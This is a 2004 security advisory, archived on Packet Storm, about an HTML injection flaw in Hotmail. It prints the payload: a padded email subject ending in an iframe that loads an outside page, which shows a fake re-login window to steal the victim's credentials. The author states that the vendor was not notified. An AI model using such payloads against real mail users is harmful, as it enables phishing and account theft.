exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hotmailfun.txt

hotmailfun.txt
Posted Mar 19, 2004
Authored by http-equiv | Site malware.com

Some amusing flaws in Hotmail.com allows for credential theft.

tags | advisory
SHA-256 | 36c149ffb66c8fd45646c4c58eb4976dbea678cc3ed3634af594e00d8731dca8

hotmailfun.txt

Change Mirror Download


Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted "buddy".

In order to gain your "little pal's" credentials, simply send
him or her an email with an extra long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="http://www.malware.com/pithy.html">

Where our iframe points to window.open along with our trojanised
passport re-sign in page. When your "chum" replies to your
email, our iframe is rendered out of sight in the message body
of the email and up goes our error window requesting him to
login again. Only this time he'll be sending you his credentials.

Notes:

1. this is too pathetic for words. Cursory checking of all
settings in hotmail 'reply to' suggests there is no de-
activation of html email when composing a reply.
2. consideration was given to informing the owner of this
particular web based mail service of this particular issue
however we have not used such a poor service in recent years. So
much so one can only suspect that such a slovenly operation is
intentional in order to force account users to upgrade to the
pay service:

a) as of three hours from time of writing we are still awaiting
receipt of emails into the hotmail account from eight [that's
numeral 8] different mail servers. Internal mail messages are
instant, but three hours for external is completely unacceptable.
b) constant 'server is busy' errors. What does 40 billion
dollars buy you today. More acreage around your acreage for more
privacy.
b) initiation and re-activation of a dormant account of the free
webmail account from the owner of this particular web based mail
service requires a magnifying glass to see. if you don't have
one, you're liable to select the pay for service as it appears
there are no other choices.
c) use yahoo mail. Instant receipt of emails from any mail
server all the time. Reply to html email subject filters tags.

End Call

--
http://www.malware.com



Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close